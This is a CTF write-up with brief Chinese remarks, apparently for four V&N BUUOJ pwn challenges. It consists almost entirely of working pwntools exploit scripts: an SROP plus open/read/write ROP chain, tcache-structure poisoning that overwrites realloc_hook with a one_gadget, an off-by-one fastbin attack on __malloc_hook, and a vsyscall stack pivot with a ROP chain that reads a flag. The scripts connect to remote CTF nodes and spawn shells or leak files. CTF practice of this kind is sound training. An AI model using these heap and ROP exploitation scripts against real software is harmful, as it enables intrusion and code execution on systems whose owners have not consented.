1.babybabypwn

  • SROP再构造rop链没啥好说。
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29793)
else:
	io=process('./vn_pwn_babybabypwn_1')
libc=ELF('./libc-2.23.so')
sla=lambda a,b:io.sendlineafter(a,b)
sa=lambda a,b:io.sendafter(a,b)
sl=lambda a:io.sendline(a)
ru=lambda a:io.recvuntil(a)
rv=lambda a:io.recv(a)
ia=lambda :io.interactive()
def leak():
	ru('gift: ')
	puts_leak=int(rv(14),16)
	log.success('puts_leak==>{}'.format(hex(puts_leak)))
	return puts_leak
	
def pwn(leak):
	libc_base=leak-libc.sym['puts']
	open_addr=libc_base+libc.sym['open']
	pop_rdi=libc_base+0x0000000000021102
	pop_rsi=libc_base+0x00000000000202e8
	pop_rdx=libc_base+0x0000000000001b92
	read_addr=libc_base+libc.sym['read']
	open_addr=libc_base+libc.sym['open']
	write_addr=libc_base+libc.sym['write']
	malloc_hook=libc_base+libc.sym['__malloc_hook']
	log.success('read_addr==>{}'.format(hex(read_addr)))
	
	frame = SigreturnFrame()
	frame.rdi = 0
	frame.rsi = malloc_hook
	frame.rdx = 0x200
	frame.rsp = malloc_hook
	frame.rip = read_addr
	payload =str(frame)[0x8:]
	sla('message: ',payload)
	#gdb.attach(io,'b read')
	#pause()
	payload =p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(malloc_hook-8)+p64(pop_rdx)+p64(8)+p64(read_addr)
	payload+=p64(pop_rdi)+p64(malloc_hook-8)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(open_addr)
	payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(malloc_hook-0x40)+p64(pop_rdx)+p64(0x40)+p64(read_addr)
	payload+=p64(pop_rdi)+p64(0)+p64(write_addr)
	sl(payload)
	sl('/flag\x00')
	print rv(0x10)
if __name__=='__main__':
	leak=leak()
	pwn(leak)

2.easyHeap

  • 由于题目的限制,只能在tcache范围内操作,所以我们可以改tcache头。具体操作如下。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',26022)
else:
	io=process(['./vn_pwn_easyTHeap'],env={"LD_PRELOAD":"/home/dingjie/libs/2.27-3ubuntu1_amd64/libc-2.27.so"})
libc=ELF('/home/dingjie/libs/2.27-3ubuntu1_amd64/libc-2.27.so')

sla=lambda a,b:io.sendlineafter(a,b)
sl=lambda a,b:io.sendafter(a,b)
ru=lambda a:io.recvuntil(a)
rv=lambda a:io.recv(a)
ia=lambda :io.interactive()
sa=lambda a,b:io.sendafter(a,b)
def add(size):
	sla('choice: ','1')
	sla('size?',str(size))
def edit(idx,content):
	sla('choice: ','2')
	sla('idx?',str(idx))
	sa('content:',content)
def show(idx):
	sla('choice: ','3')
	sla('idx?',str(idx))
def dele(idx):
	sla('choice: ','4')
	sla('idx?',str(idx))
def leak():
	add(0x80)#0
	dele(0)
	dele(0)
	show(0)
	tcache_leak=u64(rv(6).ljust(8,'\x00'))
	tcache_struct=tcache_leak-(tcache_leak&0xfff)
	log.success('tcache_struct==>{}'.format(hex(tcache_struct)))
	add(0x80)#1=0
	edit(1,p64(tcache_struct+0x10))
	add(0x80)#2=0
	add(0x80)#3=struct
	edit(3,p64(0x0700000000000000))
	add(0x90)#4=0q
	
	dele(0)
	show(0)
	leak=u64(ru('\x7f')[-6:].ljust(8,'\x00'))
	log.success('leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):
	malloc_hook=leak-0x70
	realloc_hook=malloc_hook-8
	realloc=malloc_hook-libc.sym['__malloc_hook']+libc.sym['realloc']
	one_gadget=malloc_hook-libc.sym['__malloc_hook']+0x4f322  
	edit(3,p64(0x0700000000000000)+p64(0)*14+p64(realloc_hook))
	add(0x80)#5
	edit(5,p64(0)+p64(one_gadget))
	sla('choice: ','1')
	#gdb.attach(io)
	#pause()
	add(0x60)
	ia()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

3.simpleHeap

  • 简单的off-by-one。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',25471)
else:
	io=process(['./vn_pwn_simpleHeap'])
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')

sla=lambda a,b:io.sendlineafter(a,b)
sa=lambda a,b:io.sendafter(a,b)
ru=lambda a:io.recvuntil(a)
rv=lambda :io.recv()
ia=lambda :io.interactive()

def add(size,content):
	sla('choice: ','1')
	sla('size?',str(size))
	sa('content:',content)
def edit(idx,content):
	sla('choice: ','2')
	sla('idx?',str(idx))
	sa('content:',content)
def show(idx):
	sla('choice: ','3')
	sla('idx?',str(idx))
def dele(idx):
	sla('choice: ','4')
	sla('idx?',str(idx))
def leak():
	add(0x18,'a')#0
	add(0x68,'a')#1
	add(0x18,'a')#2
	add(0x18,'a')#3
	edit(0,'\x00'*0x18+p64(0x91))
	dele(1)
	add(0x18,'aaaaaaaa')#1
	add(0x60,'a')#4
	show(1)
	ru('aaaaaaaa')
	leak=u64(ru('\x7f')[:6].ljust(8,'\x00'))-216
	log.success('leak==>{}'.format(hex(leak)))
	return leak
def pwn(leak):

	malloc_hook=leak-0x10
	log.success('malloc_hook==>{}'.format(hex(malloc_hook)))
	libc_base=leak-0x10-libc.sym['__malloc_hook']
	log.success('libc_base==>{}'.format(hex(libc_base)))
	one_gadget=libc_base+0x4526a
	realloc=libc_base+libc.sym['realloc']
	log.success('realloc==>{}'.format(hex(realloc)))
	add(0x18,'a')#5
	add(0x68,p64(0)*3+p64(0x71))#6
	edit(3,'\x00'*0x18+p64(0x41))
	dele(6)
	dele(5)
	add(0x30,'a')#5
	edit(5,'a'*0x10+p64(0)+p64(0x71)+p64(malloc_hook-35))
	add(0x68,'a')#6
	add(0x68,'a')#fake_chunk
	add(0x68,'\x00'*11+p64(one_gadget)+p64(realloc+14))
	#gdb.attach(io)
	#pause()
	sla('choice: ','1')
	sla('size?','1')
	io.interactive()
	
if __name__=='__main__':
	leak=leak()
	pwn(leak)

4.warmup

  • 这里利用的是vsyscall固定段来接栈,又由于开了沙箱然后rop读flag。
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',28989)
else:
	io=process('./vn_pwn_warmup')
libc=ELF('./libc-2.23.so')
sla=lambda a,b:io.sendlineafter(a,b)
sa=lambda a,b:io.sendafter(a,b)
sl=lambda a:io.sendline(a)
ru=lambda a:io.recvuntil(a)
rv=lambda a:io.recv(a)
ia=lambda :io.interactive()
def leak():
	ru('gift: ')
	puts_leak=int(rv(14),16)
	log.success('puts_leak==>{}'.format(hex(puts_leak)))
	return puts_leak
def pwn(leak):
	libc_base=leak-libc.sym['puts']
	log.success('libc_base==>{}'.format(hex(libc_base)))
	pop_rdi=libc_base+0x0000000000021102
	pop_rsi=libc_base+0x00000000000202e8
	pop_rdx=libc_base+0x0000000000001b92
	read_addr=libc_base+libc.sym['read']
	open_addr=libc_base+libc.sym['open']
	write_addr=libc_base+libc.sym['write']
	malloc_hook=libc_base+libc.sym['__malloc_hook']
	payload =p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(malloc_hook)
	payload+=p64(pop_rdx)+p64(8)+p64(read_addr)+p64(pop_rdi)
	payload+=p64(malloc_hook)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(open_addr)
	payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(malloc_hook)+p64(pop_rdx)+p64(0x40)+p64(read_addr)
	payload+=p64(pop_rdi)+p64(1)+p64(write_addr)
	sla('something: ',payload)
	payload='a'*0x78+p64(0xffffffffff600000)
	sa('name?',payload)
	sl('/flag\x00\x00')
	print ia()
if __name__=='__main__':
	leak=leak()
	pwn(leak)